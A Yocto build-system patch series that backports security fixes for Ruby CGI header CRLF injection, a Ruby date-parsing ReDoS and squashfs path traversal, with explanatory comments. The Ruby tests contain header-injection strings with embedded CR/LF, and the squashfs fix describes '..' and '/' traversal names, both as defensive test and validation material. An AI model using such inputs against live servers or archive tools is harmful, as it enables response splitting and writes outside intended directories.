@@ -15,6 +16,8 @@ SRC_URI = "https://download.samba.org/pub/${BPN}/src/${BP}.tar.gz \
file://CVE-2016-9841.patch \
file://CVE-2016-9842.patch \
file://CVE-2016-9843.patch \
+ file://CVE-2022-29154.patch \
+ file://0001-Fix-relative-when-copying-an-absolute-path.patch \
"
SRC_URI[md5sum] = "1581a588fde9d89f6bc6201e8129afaf"
diff --git a/meta/recipes-devtools/ruby/ruby.inc b/meta/recipes-devtools/ruby/ruby.inc
index a38b3fe624..a9f4240932 100644
--- a/meta/recipes-devtools/ruby/ruby.inc
+++ b/meta/recipes-devtools/ruby/ruby.inc
@@ -14,8 +14,8 @@ LIC_FILES_CHKSUM = "\
file://LEGAL;md5=2b6d62dc0d608f34d510ca3f428110ec \
"
-DEPENDS = "ruby-native zlib openssl tcl libyaml gdbm readline libffi"
-DEPENDS_class-native = "openssl-native libyaml-native readline-native zlib-native"
+DEPENDS = "zlib openssl libyaml gdbm readline libffi"
+DEPENDS_append_class-target = " ruby-native"
SHRT_VER = "${@oe.utils.trim_version("${PV}", 2)}"
SRC_URI = "http://cache.ruby-lang.org/pub/ruby/${SHRT_VER}/ruby-${PV}.tar.gz \
diff --git a/meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch b/meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch
new file mode 100644
index 0000000000..826daf2cda
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch
@@ -0,0 +1,32 @@
+From 2368d07660a93a2c41d63f3ab6054ca4daeef820 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 17 Nov 2020 18:31:40 +0000
+Subject: [PATCH] template/Makefile.in: do not write host cross-cc items into
+ target config
+
+This helps reproducibility.
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ template/Makefile.in | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/template/Makefile.in b/template/Makefile.in
+index 10dc826..940ee07 100644
+--- a/template/Makefile.in
++++ b/template/Makefile.in
+@@ -657,11 +657,11 @@ mjit_config.h:
+ echo '#endif'; \
+ quote MJIT_MIN_HEADER_NAME "$(MJIT_MIN_HEADER_NAME)"; \
+ sep=,; \
+- quote "MJIT_CC_COMMON " $(MJIT_CC); \
++ quote "MJIT_CC_COMMON " ; \
+ quote "MJIT_CFLAGS MJIT_ARCHFLAG" $(MJIT_CFLAGS); \
+ quote "MJIT_OPTFLAGS " $(MJIT_OPTFLAGS); \
+ quote "MJIT_DEBUGFLAGS " $(MJIT_DEBUGFLAGS); \
+- quote "MJIT_LDSHARED " $(MJIT_LDSHARED); \
++ quote "MJIT_LDSHARED " ; \
+ quote "MJIT_DLDFLAGS MJIT_ARCHFLAG" $(MJIT_DLDFLAGS); \
+ quote "MJIT_LIBS " $(LIBRUBYARG_SHARED); \
+ quote 'PRELOADENV "@PRELOADENV@"'; \
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch b/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch
deleted file mode 100644
index 1abcb7547e..0000000000
--- a/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 8946bb38b4d87549f0d99ed73c62c41933f97cc7 Mon Sep 17 00:00:00 2001
-From: Yusuke Endoh <mame@ruby-lang.org>
-Date: Tue, 29 Sep 2020 13:15:58 +0900
-Subject: [PATCH] Make it more strict to interpret some headers
-
-Some regexps were too tolerant.
-
-Upstream-Status: Backport
-[https://github.com/ruby/webrick/commit/8946bb38b4d87549f0d99ed73c62c41933f97cc7]
-CVE: CVE-2020-25613
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- lib/webrick/httprequest.rb | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/lib/webrick/httprequest.rb b/lib/webrick/httprequest.rb
-index 294bd91..d34eac7 100644
---- a/lib/webrick/httprequest.rb
-+++ b/lib/webrick/httprequest.rb
-@@ -227,9 +227,9 @@ def parse(socket=nil)
- raise HTTPStatus::BadRequest, "bad URI `#{@unparsed_uri}'."
- end
-
-- if /close/io =~ self["connection"]
-+ if /\Aclose\z/io =~ self["connection"]
- @keep_alive = false
-- elsif /keep-alive/io =~ self["connection"]
-+ elsif /\Akeep-alive\z/io =~ self["connection"]
- @keep_alive = true
- elsif @http_version < "1.1"
- @keep_alive = false
-@@ -508,7 +508,7 @@ def read_body(socket, block)
- return unless socket
- if tc = self['transfer-encoding']
- case tc
-- when /chunked/io then read_chunked(socket, block)
-+ when /\Achunked\z/io then read_chunked(socket, block)
- else raise HTTPStatus::NotImplemented, "Transfer-Encoding: #{tc}."
- end
- elsif self['content-length'] || @remaining_size
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch b/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch
new file mode 100644
index 0000000000..cc2f9853db
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch
@@ -0,0 +1,139 @@
+From 64c5045c0a6b84fdb938a8465a0890e5f7162708 Mon Sep 17 00:00:00 2001
+From: Yusuke Endoh <mame@ruby-lang.org>
+Date: Tue, 22 Nov 2022 10:49:27 +0900
+Subject: [PATCH] Prevent CRLF injection
+
+Throw a RuntimeError if the HTTP response header contains CR or LF to
+prevent HTTP response splitting.
+
+https://hackerone.com/reports/1204695
+
+Upstream-Status: Backport [https://github.com/ruby/cgi/commit/64c5045c0a6b84fdb938a8465a0890e5f7162708]
+CVE: CVE-2021-33621
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/cgi/core.rb | 45 +++++++++++++++++++++++--------------
+ test/cgi/test_cgi_header.rb | 8 +++++++
+ 2 files changed, 36 insertions(+), 17 deletions(-)
+
+diff --git a/lib/cgi/core.rb b/lib/cgi/core.rb
+index bec76e0..62e6068 100644
+--- a/lib/cgi/core.rb
++++ b/lib/cgi/core.rb
+@@ -188,17 +188,28 @@ class CGI
+ # Using #header with the HTML5 tag maker will create a <header> element.
+ alias :header :http_header
+
++ def _no_crlf_check(str)
++ if str
++ str = str.to_s
++ raise "A HTTP status or header field must not include CR and LF" if str =~ /[\r\n]/
++ str
++ else
++ nil
++ end
++ end
++ private :_no_crlf_check
++
+ def _header_for_string(content_type) #:nodoc:
+ buf = ''.dup
+ if nph?()
+- buf << "#{$CGI_ENV['SERVER_PROTOCOL'] || 'HTTP/1.0'} 200 OK#{EOL}"
++ buf << "#{_no_crlf_check($CGI_ENV['SERVER_PROTOCOL']) || 'HTTP/1.0'} 200 OK#{EOL}"
+ buf << "Date: #{CGI.rfc1123_date(Time.now)}#{EOL}"
+- buf << "Server: #{$CGI_ENV['SERVER_SOFTWARE']}#{EOL}"
++ buf << "Server: #{_no_crlf_check($CGI_ENV['SERVER_SOFTWARE'])}#{EOL}"
+ buf << "Connection: close#{EOL}"
+ end
+- buf << "Content-Type: #{content_type}#{EOL}"
++ buf << "Content-Type: #{_no_crlf_check(content_type)}#{EOL}"
+ if @output_cookies
+- @output_cookies.each {|cookie| buf << "Set-Cookie: #{cookie}#{EOL}" }
++ @output_cookies.each {|cookie| buf << "Set-Cookie: #{_no_crlf_check(cookie)}#{EOL}" }
+ end
+ return buf
+ end # _header_for_string
+@@ -213,9 +224,9 @@ class CGI
+ ## NPH
+ options.delete('nph') if defined?(MOD_RUBY)
+ if options.delete('nph') || nph?()
+- protocol = $CGI_ENV['SERVER_PROTOCOL'] || 'HTTP/1.0'
++ protocol = _no_crlf_check($CGI_ENV['SERVER_PROTOCOL']) || 'HTTP/1.0'
+ status = options.delete('status')
+- status = HTTP_STATUS[status] || status || '200 OK'
++ status = HTTP_STATUS[status] || _no_crlf_check(status) || '200 OK'
+ buf << "#{protocol} #{status}#{EOL}"
+ buf << "Date: #{CGI.rfc1123_date(Time.now)}#{EOL}"
+ options['server'] ||= $CGI_ENV['SERVER_SOFTWARE'] || ''
+@@ -223,38 +234,38 @@ class CGI
+ end
+ ## common headers
+ status = options.delete('status')
+- buf << "Status: #{HTTP_STATUS[status] || status}#{EOL}" if status
++ buf << "Status: #{HTTP_STATUS[status] || _no_crlf_check(status)}#{EOL}" if status
+ server = options.delete('server')
+- buf << "Server: #{server}#{EOL}" if server
++ buf << "Server: #{_no_crlf_check(server)}#{EOL}" if server
+ connection = options.delete('connection')
+- buf << "Connection: #{connection}#{EOL}" if connection
++ buf << "Connection: #{_no_crlf_check(connection)}#{EOL}" if connection
+ type = options.delete('type')
+- buf << "Content-Type: #{type}#{EOL}" #if type
++ buf << "Content-Type: #{_no_crlf_check(type)}#{EOL}" #if type
+ length = options.delete('length')
+- buf << "Content-Length: #{length}#{EOL}" if length
++ buf << "Content-Length: #{_no_crlf_check(length)}#{EOL}" if length
+ language = options.delete('language')
+- buf << "Content-Language: #{language}#{EOL}" if language
++ buf << "Content-Language: #{_no_crlf_check(language)}#{EOL}" if language
+ expires = options.delete('expires')
+ buf << "Expires: #{CGI.rfc1123_date(expires)}#{EOL}" if expires
+ ## cookie
+ if cookie = options.delete('cookie')
+ case cookie
+ when String, Cookie
+- buf << "Set-Cookie: #{cookie}#{EOL}"
++ buf << "Set-Cookie: #{_no_crlf_check(cookie)}#{EOL}"
+ when Array
+ arr = cookie
+- arr.each {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++ arr.each {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+ when Hash
+ hash = cookie
+- hash.each_value {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++ hash.each_value {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+ end
+ end
+ if @output_cookies
+- @output_cookies.each {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++ @output_cookies.each {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+ end
+ ## other headers
+ options.each do |key, value|
+- buf << "#{key}: #{value}#{EOL}"
++ buf << "#{_no_crlf_check(key)}: #{_no_crlf_check(value)}#{EOL}"
+ end
+ return buf
+ end # _header_for_hash
+diff --git a/test/cgi/test_cgi_header.rb b/test/cgi/test_cgi_header.rb
+index bab2d03..ec2f4de 100644
+--- a/test/cgi/test_cgi_header.rb
++++ b/test/cgi/test_cgi_header.rb
+@@ -176,6 +176,14 @@ class CGIHeaderTest < Test::Unit::TestCase
+ end
+
+
++ def test_cgi_http_header_crlf_injection
++ cgi = CGI.new
++ assert_raise(RuntimeError) { cgi.http_header("text/xhtml\r\nBOO") }
++ assert_raise(RuntimeError) { cgi.http_header("type" => "text/xhtml\r\nBOO") }
++ assert_raise(RuntimeError) { cgi.http_header("status" => "200 OK\r\nBOO") }
++ assert_raise(RuntimeError) { cgi.http_header("location" => "text/xhtml\r\nBOO") }
++ end
++
+
+ instance_methods.each do |method|
+ private method if method =~ /^test_(.*)/ && $1 != ENV['TEST']
+--
+2.25.1
+
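
The essence of the fix above is the _no_crlf_check helper: any status line, header value or cookie that embeds CR or LF is rejected before it reaches the output buffer, which is what prevents HTTP response splitting. The same predicate expressed in plain C, purely for illustration (not part of the Ruby change):

    /* Illustrative only: a header field is safe when it is present and
     * contains neither carriage return nor line feed. */
    #include <string.h>

    static int header_field_is_safe(const char *field)
    {
        return field != NULL && strpbrk(field, "\r\n") == NULL;
    }
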
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch b/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch
new file mode 100644
index 0000000000..c25a147d36
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch
@@ -0,0 +1,61 @@
+From 957bb7cb81995f26c671afce0ee50a5c660e540e Mon Sep 17 00:00:00 2001
+From: Hiroshi SHIBATA <hsbt@ruby-lang.org>
+Date: Wed, 29 Mar 2023 13:28:25 +0900
+Subject: [PATCH] CVE-2023-28756
+
+CVE: CVE-2023-28756
+Upstream-Status: Backport [https://github.com/ruby/ruby/commit/957bb7cb81995f26c671afce0ee50a5c660e540e]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/time.rb | 6 +++---
+ test/test_time.rb | 9 +++++++++
+ 2 files changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/lib/time.rb b/lib/time.rb
+index f27bacd..4a86e8e 100644
+--- a/lib/time.rb
++++ b/lib/time.rb
+@@ -501,8 +501,8 @@ class Time
+ (Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+
+ (\d{2,})\s+
+ (\d{2})\s*
+- :\s*(\d{2})\s*
+- (?::\s*(\d{2}))?\s+
++ :\s*(\d{2})
++ (?:\s*:\s*(\d\d))?\s+
+ ([+-]\d{4}|
+ UT|GMT|EST|EDT|CST|CDT|MST|MDT|PST|PDT|[A-IK-Z])/ix =~ date
+ # Since RFC 2822 permit comments, the regexp has no right anchor.
+@@ -717,7 +717,7 @@ class Time
+ #
+ # If self is a UTC time, Z is used as TZD. [+-]hh:mm is used otherwise.
+ #
+- # +fractional_digits+ specifies a number of digits to use for fractional
++ # +fraction_digits+ specifies a number of digits to use for fractional
+ # seconds. Its default value is 0.
+ #
+ # require 'time'
+diff --git a/test/test_time.rb b/test/test_time.rb
+index ca20788..4f11048 100644
+--- a/test/test_time.rb
++++ b/test/test_time.rb
+@@ -62,6 +62,15 @@ class TestTimeExtension < Test::Unit::TestCase # :nodoc:
+ assert_equal(true, t.utc?)
+ end
+
++ def test_rfc2822_nonlinear
++ pre = ->(n) {"0 Feb 00 00 :00" + " " * n}
++ assert_linear_performance([100, 500, 5000, 50_000], pre: pre) do |s|
++ assert_raise(ArgumentError) do
++ Time.rfc2822(s)
++ end
++ end
++ end
++
+ def test_encode_rfc2822
+ t = Time.utc(1)
+ assert_equal("Mon, 01 Jan 0001 00:00:00 -0000", t.rfc2822)
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/ruby/ruby_2.7.1.bb b/meta/recipes-devtools/ruby/ruby_2.7.6.bb
index f87686f6f7..7e6373bd24 100644
--- a/meta/recipes-devtools/ruby/ruby_2.7.1.bb
+++ b/meta/recipes-devtools/ruby/ruby_2.7.6.bb
@@ -6,11 +6,17 @@ SRC_URI += " \
file://remove_has_include_macros.patch \
file://run-ptest \
file://0001-Modify-shebang-of-libexec-y2racc-and-libexec-racc2y.patch \
- file://CVE-2020-25613.patch \
+ file://0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch \
+ file://CVE-2023-28756.patch \
+ file://CVE-2021-33621.patch \
"
-SRC_URI[md5sum] = "debb9c325bf65021214451660f46e909"
-SRC_URI[sha256sum] = "d418483bdd0000576c1370571121a6eb24582116db0b7bb2005e90e250eae418"
+SRC_URI[md5sum] = "f972fb0cce662966bec10d5c5f32d042"
+SRC_URI[sha256sum] = "e7203b0cc09442ed2c08936d483f8ac140ec1c72e37bb5c401646b7866cb5d10"
+
+# CVE-2021-28966 is Windows-specific and does not affect Linux
+# https://security-tracker.debian.org/tracker/CVE-2021-28966
+CVE_CHECK_WHITELIST += "CVE-2021-28966"
PACKAGECONFIG ??= ""
PACKAGECONFIG += "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}"
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
index f84a7e18c8..95dccb9cae 100755
--- a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
@@ -72,12 +72,12 @@ exec_postinst_scriptlets() {
else
echo "ERROR: postinst $i failed."
[ "$POSTINST_LOGGING" = "1" ] && eval echo "ERROR: postinst $i failed." $append_log
- remove_pi_dir=0
+ remove_rcsd_link=0
fi
done
}
-remove_pi_dir=1
+remove_rcsd_link=1
if $pm_installed; then
case $pm in
"ipk")
@@ -92,9 +92,7 @@ else
exec_postinst_scriptlets
fi
-# since all postinstalls executed successfully, remove the postinstalls directory
-# and the rcS.d link
-if [ $remove_pi_dir = 1 ]; then
- rm -rf $pi_dir
+# since all postinstalls executed successfully, remove the rcS.d link
+if [ $remove_rcsd_link = 1 ]; then
remove_rcsd_link
fi
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
index 7f72f3388a..b6b81d5c1a 100644
--- a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
@@ -1,7 +1,7 @@
[Unit]
Description=Run pending postinsts
DefaultDependencies=no
-After=systemd-remount-fs.service systemd-tmpfiles-setup.service tmp.mount
+After=systemd-remount-fs.service systemd-tmpfiles-setup.service tmp.mount ldconfig.service
Before=sysinit.target
[Service]
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb b/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
index 85b3fc867e..c353d4b79c 100644
--- a/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
@@ -1,4 +1,5 @@
SUMMARY = "Runs postinstall scripts on first boot of the target device"
+DESCRIPTION = "${SUMMARY}"
SECTION = "devel"
PR = "r10"
LICENSE = "MIT"
diff --git a/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
new file mode 100644
index 0000000000..95e2534ee4
--- /dev/null
+++ b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
@@ -0,0 +1,253 @@
+Backport a patch to fix CVE-2021-40153, and remove the version update in unsquashfs.c
+for compatibility.
+
+Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/79b5a55]
+CVE: CVE-2021-40153
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 79b5a555058eef4e1e7ff220c344d39f8cd09646 Mon Sep 17 00:00:00 2001
+From: Phillip Lougher <phillip@squashfs.org.uk>
+Date: Sat, 16 Jan 2021 20:08:55 +0000
+Subject: [PATCH] Unsquashfs: fix write outside destination directory exploit
+
+An issue on Github (https://github.com/plougher/squashfs-tools/issues/72)
+shows how some specially crafted Squashfs filesystems containing
+invalid file names (with '/' and ..) can cause Unsquashfs to write
+files outside of the destination directory.
+
+This commit fixes this exploit by checking all names for
+validity.
+
+In doing so I have also added checks for '.' and for names that
+are shorter than they should be (names in the file system should
+not have '\0' terminators).
+
+Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk>
+---
+ squashfs-tools/Makefile | 5 ++-
+ squashfs-tools/unsquash-1.c | 9 +++++-
+ squashfs-tools/unsquash-1234.c | 58 ++++++++++++++++++++++++++++++++++
+ squashfs-tools/unsquash-2.c | 9 +++++-
+ squashfs-tools/unsquash-3.c | 9 +++++-
+ squashfs-tools/unsquash-4.c | 9 +++++-
+ squashfs-tools/unsquashfs.h | 5 ++-
+ 7 files changed, 98 insertions(+), 6 deletions(-)
+ create mode 100644 squashfs-tools/unsquash-1234.c
+
+diff --git a/squashfs-tools/Makefile b/squashfs-tools/Makefile
+index aee4b960..20feaca2 100644
+--- a/squashfs-tools/Makefile
++++ b/squashfs-tools/Makefile
+@@ -156,7 +156,8 @@ MKSQUASHFS_OBJS = mksquashfs.o read_fs.o action.o swap.o pseudo.o compressor.o \
+ caches-queues-lists.o
+
+ UNSQUASHFS_OBJS = unsquashfs.o unsquash-1.o unsquash-2.o unsquash-3.o \
+- unsquash-4.o unsquash-123.o unsquash-34.o swap.o compressor.o unsquashfs_info.o
++ unsquash-4.o unsquash-123.o unsquash-34.o unsquash-1234.o swap.o \
++ compressor.o unsquashfs_info.o
+
+ CFLAGS ?= -O2
+ CFLAGS += $(EXTRA_CFLAGS) $(INCLUDEDIR) -D_FILE_OFFSET_BITS=64 \
+@@ -350,6 +351,8 @@ unsquash-123.o: unsquashfs.h unsquash-123.c squashfs_fs.h squashfs_compat.h
+
+ unsquash-34.o: unsquashfs.h unsquash-34.c
+
++unsquash-1234.o: unsquash-1234.c
++
+ unsquashfs_xattr.o: unsquashfs_xattr.c unsquashfs.h squashfs_fs.h xattr.h
+
+ unsquashfs_info.o: unsquashfs.h squashfs_fs.h
+diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c
+index 34eced36..28326cb1 100644
+--- a/squashfs-tools/unsquash-1.c
++++ b/squashfs-tools/unsquash-1.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -285,6 +285,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c
+new file mode 100644
+index 00000000..c2d4f42b
+--- /dev/null
++++ b/squashfs-tools/unsquash-1234.c
+@@ -0,0 +1,58 @@
++/*
++ * Unsquash a squashfs filesystem. This is a highly compressed read only
++ * filesystem.
++ *
++ * Copyright (c) 2021
++ * Phillip Lougher <phillip@squashfs.org.uk>
++ *
++ * This program is free software; you can redistribute it and/or
++ * modify it under the terms of the GNU General Public License
++ * as published by the Free Software Foundation; either version 2,
++ * or (at your option) any later version.
++ *
++ * This program is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with this program; if not, write to the Free Software
++ * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
++ *
++ * unsquash-1234.c
++ *
++ * Helper functions used by unsquash-1, unsquash-2, unsquash-3 and
++ * unsquash-4.
++ */
++
++#define TRUE 1
++#define FALSE 0
++/*
++ * Check name for validity, name should not
++ * - be ".", "./", or
++ * - be "..", "../" or
++ * - have a "/" anywhere in the name, or
++ * - be shorter than the expected size
++ */
++int check_name(char *name, int size)
++{
++ char *start = name;
++
++ if(name[0] == '.') {
++ if(name[1] == '.')
++ name++;
++ if(name[1] == '/' || name[1] == '\0')
++ return FALSE;
++ }
++
++ while(name[0] != '/' && name[0] != '\0')
++ name ++;
++
++ if(name[0] == '/')
++ return FALSE;
++
++ if((name - start) != size)
++ return FALSE;
++
++ return TRUE;
++}
+diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c
+index 4b3d767e..474064e1 100644
+--- a/squashfs-tools/unsquash-2.c
++++ b/squashfs-tools/unsquash-2.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2013, 2019
++ * Copyright (c) 2009, 2010, 2013, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -386,6 +386,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c
+index 02c31fc5..65cfe4d9 100644
+--- a/squashfs-tools/unsquash-3.c
++++ b/squashfs-tools/unsquash-3.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -413,6 +413,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c
+index 8475835c..aa23a841 100644
+--- a/squashfs-tools/unsquash-4.c
++++ b/squashfs-tools/unsquash-4.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -349,6 +349,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h
+index 934618b2..db1da7a0 100644
+--- a/squashfs-tools/unsquashfs.h
++++ b/squashfs-tools/unsquashfs.h
+@@ -4,7 +4,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2013, 2014, 2019
++ * Copyright (c) 2009, 2010, 2013, 2014, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -261,4 +261,7 @@ extern int read_ids(int, long long, long long, unsigned int **);
+
+ /* unsquash-34.c */
+ extern long long *alloc_index_table(int);
++
++/* unsquash-1234.c */
++extern int check_name(char *, int);
+ #endif
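
check_name() above returns the TRUE/FALSE macros defined at the top of unsquash-1234.c, and the callers pass dire->size + 1, i.e. the expected length of the name. A throwaway harness, illustrative only and assuming it is linked against the new unsquash-1234.c, shows the inputs the helper is meant to reject:

    /* Illustrative only: exercise check_name() with representative names.
     * TRUE is 1, FALSE is 0; size is the length the name should have. */
    #include <assert.h>

    extern int check_name(char *name, int size);   /* unsquash-1234.c */

    static void check_name_examples(void)
    {
        assert(check_name(".",        1) == 0);    /* "." rejected          */
        assert(check_name("..",       2) == 0);    /* ".." rejected         */
        assert(check_name("a/b",      3) == 0);    /* embedded '/' rejected */
        assert(check_name("name",     6) == 0);    /* shorter than claimed  */
        assert(check_name("file.txt", 8) == 1);    /* ordinary name is fine */
    }
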
diff --git a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
index b06951df36..5d754b20b3 100644
--- a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
+++ b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
@@ -1,14 +1,17 @@
# Note, we can probably remove the lzma option as it has been replaced with xz,
# and I don't think the kernel supports it any more.
SUMMARY = "Tools for manipulating SquashFS filesystems"
+HOMEPAGE = "https://github.com/plougher/squashfs-tools"
+DESCRIPTION = "Tools to create and extract Squashfs filesystems."
SECTION = "base"
LICENSE = "GPL-2"
LIC_FILES_CHKSUM = "file://../COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
PV = "4.4"
SRCREV = "52eb4c279cd283ed9802dd1ceb686560b22ffb67"
-SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https \
+SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https;branch=master \
file://0001-squashfs-tools-fix-build-failure-against-gcc-10.patch;striplevel=2 \
+ file://CVE-2021-40153.patch;striplevel=2 \
"
S = "${WORKDIR}/git/squashfs-tools"
diff --git a/meta/recipes-devtools/strace/strace/run-ptest b/meta/recipes-devtools/strace/strace/run-ptest
index 4660207220..3a51fb0be9 100755
--- a/meta/recipes-devtools/strace/strace/run-ptest
+++ b/meta/recipes-devtools/strace/strace/run-ptest
@@ -1,5 +1,5 @@
#!/bin/sh
-export TIMEOUT_DURATION=120
+export TIMEOUT_DURATION=240
chown nobody tests
chown nobody tests/*
chown nobody ../ptest
